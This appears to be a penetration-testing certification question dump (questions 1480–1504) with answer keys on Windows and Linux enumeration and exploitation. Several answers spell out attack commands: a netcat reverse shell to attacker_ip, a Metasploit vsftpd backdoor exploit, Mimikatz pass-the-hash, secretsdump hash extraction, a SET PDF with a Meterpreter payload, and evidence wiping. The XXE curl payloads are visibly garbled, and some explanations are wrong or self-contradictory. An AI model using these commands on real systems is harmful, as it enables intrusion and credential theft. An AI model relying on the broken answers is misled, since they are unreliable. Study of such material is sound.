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# C)PTE

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**Question: 1480**

During a penetration test, you've used a rootkit to hide a malicious service on a Windows Server 2019 system. The service is named MalSvc. Which command would you use to verify if the service is hidden from standard service enumeration tools?

- A. `sc query MalSvc`
- B. `Get-Service -Name MalSvc`
- C. `net start MalSvc`
- D. `wmic service where name='MalSvc' get name, state`

Answer: B

Explanation: The PowerShell command `Get-Service -Name MalSvc` queries the Service Control Manager directly, bypassing potential rootkit hooks in user-space tools like `sc` or `wmic`. `net start` attempts to start the service, which is irrelevant here.

**Question: 1481**

You are using PowerShell to enumerate all active sessions on a domain controller. Which command provides this information?

- A. `Get-NetSession`
- B. `Get-ADSession`
- C. `net session`
- D. `Get-Process -Name session`

Answer: A

Explanation: `Get-NetSession`, from PowerView, lists all active sessions on a domain controller, which is valuable for identifying lateral movement opportunities.

**Question: 1482**

A penetration tester is tasked with exploiting a Metasploitable 2 instance running on 192.168.56.101. After performing an Nmap scan with `nmap -sV -p- 192.168.56.101`, the

tester identifies an open VSFTPD 2.3.4 service on port 21, which is vulnerable to a backdoor exploit (CVE-2011-2523). Using Metasploit, which command sequence correctly initiates the exploit to gain a shell?

- A. use exploit/unix/ftp/vsftpd\_backdoor; set RHOST 192.168.56.101; set PAYLOAD linux/x86/shell\_reverse\_tcp; run
- B. use auxiliary/ftp/vsftpd\_234\_backdoor; set RHOSTS 192.168.56.101; set PORT 21; run
- C. use exploit/linux/ftp/vsftpd\_234; set TARGET 192.168.56.101; set RPORT 21; exploit
- D. use exploit/unix/ftp/vsftpd\_234\_backdoor; set RHOST 192.168.56.101; set RPORT 21; exploit

Answer: D

Explanation: The VSFTPD 2.3.4 backdoor vulnerability (CVE-2011-2523) is exploited using the Metasploit module exploit/unix/ftp/vsftpd\_234\_backdoor. The correct command sequence involves selecting the exploit with use exploit/unix/ftp/vsftpd\_234\_backdoor, setting the remote host with set RHOST 192.168.56.101, setting the port with set RPORT 21, and executing with exploit. This module automatically triggers a shell on port 6200 without requiring a specific payload configuration, unlike the incorrect options which either use non-existent modules, incorrect syntax, or misconfigured parameters.

### Question: 1483

A penetration tester uses Rapid7 InsightVM to scan a network with 200 virtual machines. To reduce scan time while maintaining accuracy, which setting should be prioritized?

- A. Enable "Smart Sampling" with vulnerability prioritization
- B. Use "Lightweight Scan" template
- C. Configure "Scan Throttling" with low intensity
- D. Enable "Parallel Scanning" with 10 threads

Answer: A

Explanation: Smart Sampling in InsightVM reduces scan time by prioritizing high-risk vulnerabilities while maintaining accuracy, ideal for large VM environments. Parallel Scanning may overwhelm resources, Lightweight Scan sacrifices depth, and Scan Throttling slows scans without prioritization.

**Question: 1484**

A penetration tester wants to exploit a misconfigured sudoers file. Which command would best enumerate sudo privileges?

- A. `sudo -l`
- B. `cat /etc/sudoers`
- C. `id`
- D. `whoami`

Answer: A

Explanation: The `sudo -l` command lists the current user's sudo privileges, revealing potential misconfigurations.

**Question: 1485**

To evade a firewall that blocks outbound ICMP ping requests, you use `hping3` to craft TCP ACK packets to probe a target's port 80. Which `hping3` command sends TCP ACK packets with a source port of 12345?

- A. `hping3 -A -p 80 -S 12345 target.com`
- B. `hping3 -A -p 80 --sport 12345 target.com`
- C. `hping3 -F -p 80 --sport 12345 target.com`
- D. `hping3 -A -p 80 -s 12345 target.com`

Answer: B

Explanation: The command `hping3 -A -p 80 --sport 12345 target.com` sends TCP ACK packets (-A) to port 80 with a source port of 12345 (--sport). This mimics a response packet, potentially bypassing the firewall's ICMP restrictions. The -S option in the first choice sets the SYN flag, -F sets the FIN flag, and -s is not a valid `hping3` option.

**Question: 1486**

You need to enumerate all Active Directory groups a user belongs to using PowerShell. Which command correctly retrieves this information for the user "jdoe"?

- A. Get-ADUser -Identity "jdoe" -Properties MemberOf | Select-Object -ExpandProperty MemberOf
- B. Get-ADGroupMember -Identity "jdoe" | Select-Object Name
- C. Get-ADUser -Identity "jdoe" | Select-Object Groups
- D. Get-ADPrincipalGroupMembership -Identity "jdoe" | Select-Object Name

Answer: D

Explanation: The command Get-ADPrincipalGroupMembership -Identity "jdoe" | Select-Object Name is designed to retrieve all groups a user belongs to.

### Question: 1487

A penetration tester is assessing an IoT-based smart garage door opener controlled by a mobile app. The app uses a WebView component that loads a configuration page from a remote server without validating the SSL certificate. Which attack can the tester perform to compromise the app?

- A. Injecting malicious JavaScript into the app's local storage
- B. Exploiting a buffer overflow in the WebView component
- C. Performing a MITM attack to serve a malicious configuration page
- D. Using a brute-force attack to guess the app's session token

Answer: C

Explanation: Without SSL certificate validation, a MITM attack can intercept the WebView's connection and serve a malicious configuration page, potentially compromising the app and the garage door opener.

### Question: 1488

Which of the following is the most appropriate way to document a finding involving weak SSL/TLS ciphers?

- A. Reference the vendor documentation only
- B. Describe SSL/TLS in general terms

- C. List the weak ciphers and provide the output of an nmap --script ssl-enum-ciphers scan
- D. Omit technical details for brevity

Answer: C

Explanation: Listing the weak ciphers and providing scan output offers clear, actionable evidence.

### Question: 1489

You are analyzing Wireshark captures and want to detect ARP spoofing attempts. Which filter identifies ARP response packets?

- A. arp.opcode == 2
- B. arp.response
- C. arp && ip.src == 192.168.1.100
- D. arp.type == "response"

Answer: A

Explanation: The filter arp.opcode == 2 identifies ARP response packets.

### Question: 1490

A client requests a vulnerability assessment of their internal systems. Which of the following is a key challenge unique to internal assessments?

- A. Complexity due to diverse operating systems and configurations
- B. High risk of detection by IDS
- C. Limited access to target systems
- D. Inability to use automated tools

Answer: A

Explanation: Internal assessments often face challenges due to the variety of systems, configurations, and legacy devices present in internal networks.

### Question: 1491

You have a SAM hive file and want to extract hashes using `secretsdump.py`. Which command should you use, assuming you have the SYSTEM hive as well?

- A. `secretsdump.py -sam SAM -system SYSTEM extract`
- B. `secretsdump.py -sam SAM -system SYSTEM -o hashes.txt`
- C. `secretsdump.py -sam SAM -system SYSTEM -dump`
- D. `secretsdump.py -sam SAM -system SYSTEM local`

Answer: D

Explanation: The `secretsdump.py -sam SAM -system SYSTEM local` command extracts hashes from SAM and SYSTEM hives. The `local` flag specifies offline extraction. The other options use incorrect flags.

### Question: 1492

A penetration tester is tasked with gathering information about a target organization's infrastructure. They decide to use Google Dorking to identify sensitive files exposed on the target's web server. Which Google query would most effectively locate PDF files containing sensitive information such as usernames or passwords on the target domain "example.com"?

- A. `filetype:pdf site:*.example.com inurl:login`
- B. `filetype:pdf site:example.com intext:"username | password"`
- C. `intext:"username password" site:example.com ext:pdf`
- D. `site:example.com filetype:pdf inurl:(admin | login)`

Answer: B

Explanation: The query `filetype:pdf site:example.com intext:"username | password"` is the most effective for locating PDF files containing sensitive information. The `filetype:pdf` operator restricts results to PDF documents, `site:example.com` limits the search to the target domain, and `intext:"username | password"` searches for documents containing either "username" or "password," increasing the likelihood of finding sensitive data. The other options are less precise: `filetype:pdf site:*.example.com inurl:login` includes subdomains and focuses on login pages, which may not specifically yield sensitive files;

intext:"username password" site:example.com ext:pdf requires both terms to appear together, potentially missing relevant results; and site:example.com filetype:pdf inurl:(admin | login) focuses on URLs rather than content, which is less likely to identify sensitive information within PDFs.

### Question: 1493

A tester is exploiting a web app with a file upload feature. Which command can be used to start a reverse shell from the target to the attacker's machine using netcat?

- A. nc -lvp 4444
- B. nc -e /bin/sh attacker\_ip 4444
- C. nc -zv attacker\_ip 4444
- D. nc -u attacker\_ip 4444

Answer: B

Explanation: The command `nc -e /bin/sh attacker_ip 4444` initiates a reverse shell from the target to the attacker's machine.

### Question: 1494

You've installed a rootkit on a Linux system that hooks the open system call to hide files. Which command would you use to detect this by tracing system calls of a process?

- A. ltrace -e open ls
- B. strace -e open ls
- C. gdb --pid \$\$ (ls)
- D. perf trace ls

Answer: B

Explanation: The `strace -e open ls` command traces the open system call for the `ls` command, revealing if the rootkit manipulates file access. `ltrace` traces library calls, `gdb` is a debugger, and `perf` is for performance analysis, not system call tracing.

**Question: 1495**

You are asked to enumerate all open ports and services on a Windows server. Which PowerShell command would you use?

- A. `curl -I target_ip`
- B. `netstat -an`
- C. `arp -a`
- D. `Get-NetTCPConnection`

Answer: D

Explanation: `Get-NetTCPConnection` lists all active TCP connections and listening ports on a Windows system.

**Question: 1496**

During a penetration test, you obtain a list of NTLMv2 hashes from a domain controller. You want to use PowerShell to automate a pass-the-hash attack using Mimikatz. Which PowerShell command correctly invokes Mimikatz for this purpose?

- A. `Invoke-Expression "mimikatz sekurlsa::pth /user:Administrator /domain:corp.local /hash:"`
- B. `Start-Process "mimikatz.exe" -ArgumentList "sekurlsa::pth /user:Administrator /domain:corp.local /ntlm:"`
- C. `& "mimikatz.exe" -Command "sekurlsa::pass /user:Administrator /hash:"`
- D. `Invoke-Mimikatz -Command "sekurlsa::pth /user:Administrator /domain:corp.local /ntlm:"`

Answer: D

Explanation: The command `Invoke-Mimikatz -Command "sekurlsa::pth /user:Administrator /domain:corp.local /ntlm:<hash>"` correctly uses the `Invoke-Mimikatz` script to perform a pass-the-hash attack with NTLMv2 hashes.

**Question: 1497**

During an OpenVAS scan, a tester finds a potential XXE vulnerability (CWE-611) in a web application. To confirm, the tester crafts an XML payload. Which curl command tests for XXE?

- A. `curl -X POST "http://target.com/xml" --data "]">&x;"`
- B. `curl -X POST "http://target.com/xml" --data "admin"`
- C. `curl -X GET "http://target.com/xml?data=admin"`
- D. `curl -X POST "http://target.com/xml" --data ""`

Answer: A

Explanation: XXE (XML External Entity) vulnerabilities are tested by injecting a malicious XML payload, such as one referencing `file:///etc/passwd`. The curl command with the DOCTYPE entity tests for file disclosure.

#### Question: 1498

You need to remove all traces of a file download from a Windows system. Which sequence is most effective?

- A. `del /f /q <file> && cipher /w:<drive>`
- B. `move <file> C:\Temp`
- C. `attrib -h -s <file>`
- D. `ren <file> <newname>`

Answer: A

Explanation: Deleting the file and using cipher /w to wipe free space ensures the file cannot be recovered.

#### Question: 1499

You need to identify a target's email servers during passive reconnaissance. Which command provides this information without direct interaction?

- A. `dig mailcorp.com MX`
- B. `nslookup -type=A mailcorp.com`

- C. `host -t NS mailcorp.com`
- D. `whois mailcorp.com`

Answer: A

Explanation: The `dig mailcorp.com MX` command retrieves MX records, identifying email servers passively. A records provide IP addresses, NS records list name servers, and WHOIS queries provide registration details, not email server information.

### Question: 1500

A penetration tester uses `nmap -sV -p 25 192.168.7.10` and identifies an SMTP server running Postfix 3.1.0. To enumerate valid email addresses, which Nmap script should be used?

- A. `nmap --script smtp-commands -p 25 192.168.7.10`
- B. `nmap --script smtp-enum-users -p 25 192.168.7.10`
- C. `nmap --script smtp-open-relay -p 25 192.168.7.10`
- D. `nmap --script smtp-vuln-cve2011-1720 -p 25 192.168.7.10`

Answer: B

Explanation: The command `nmap --script smtp-enum-users -p 25 192.168.7.10` uses the `smtp-enum-users` script to enumerate valid email addresses by testing user accounts on the SMTP server. The `smtp-commands` script lists supported commands, `smtp-open-relay` checks for open relay vulnerabilities, and `smtp-vuln-cve2011-1720` tests for a specific vulnerability, none of which focus on email address enumeration.

### Question: 1501

A penetration tester wants to enumerate password policies on a Windows server using `enum4linux`. Which command should be used?

- A. `enum4linux -G <target>`
- B. `enum4linux -U <target>`
- C. `enum4linux -S <target>`
- D. `enum4linux -P <target>`

Answer: D

Explanation: The -P flag in enum4linux retrieves password policy information from the target system.

**Question: 1502**

While enumerating a Windows server using nbtstat -A 192.168.1.100, you receive output showing the NetBIOS name table with <20> indicating a file server. What tool and command should you use next to enumerate shared resources?

- A. enum4linux -a 192.168.1.100
- B. net view \\192.168.1.100
- C. rpcclient -U "" 192.168.1.100
- D. smbclient -L //192.168.1.100 -N

Answer: D

Explanation: The <20> in the NetBIOS name table indicates the target is a file server, meaning it likely has SMB shares. The command smbclient -L //192.168.1.100 -N attempts to list SMB shares anonymously (without credentials, using -N), which is a direct and effective way to enumerate shared resources. While enum4linux is useful for broader enumeration, it's less specific to share listing. rpcclient focuses on RPC services, and net view requires Windows-specific access, which may not work anonymously.

**Question: 1503**

You are exploiting a buffer overflow in a 64-bit binary with NX enabled. Which technique is most effective for code execution?

- A. Return-Oriented Programming (ROP)
- B. Injecting shellcode into the stack
- C. Overwriting the SEH handler
- D. Using a format string exploit

Answer: A

Explanation: With NX (No-eXecute) enabled, ROP is used to execute code by chaining existing instructions.

### Question: 1504

You are conducting a penetration test on a network with a Cisco ASA firewall. The client reports recent phishing attacks exploiting social engineering. To simulate a spear-phishing attack, you plan to use the Social-Engineer Toolkit (SET). Which SET command sequence creates a malicious PDF with an embedded Meterpreter payload?

- A. setoolkit -> 1 -> 2 -> 3 -> adobe\_pdf\_embedded\_exe -> windows/meterpreter/reverse\_tcp
- B. setoolkit -> 2 -> 1 -> 4 -> adobe\_pdf\_embedded\_exe -> windows/shell\_reverse\_tcp
- C. setoolkit -> 1 -> 3 -> 2 -> pdf\_exploit -> windows/meterpreter/reverse\_https
- D. setoolkit -> 2 -> 2 -> 1 -> malicious\_pdf -> windows/exec

Answer: A

Explanation: In SET, selecting option 1 (Social-Engineering Attacks), then 2 (Website Attack Vectors), and 3 (Infectious Media Generator) allows creation of an `adobe_pdf_embedded_exe`, which embeds a Meterpreter payload (`windows/meterpreter/reverse_tcp`) in a PDF. This simulates a phishing attack effectively. Other options either select incorrect attack vectors (e.g., Website Attack Vectors or non-existent modules (`pdf_exploit`, `malicious_pdf`), making them invalid.

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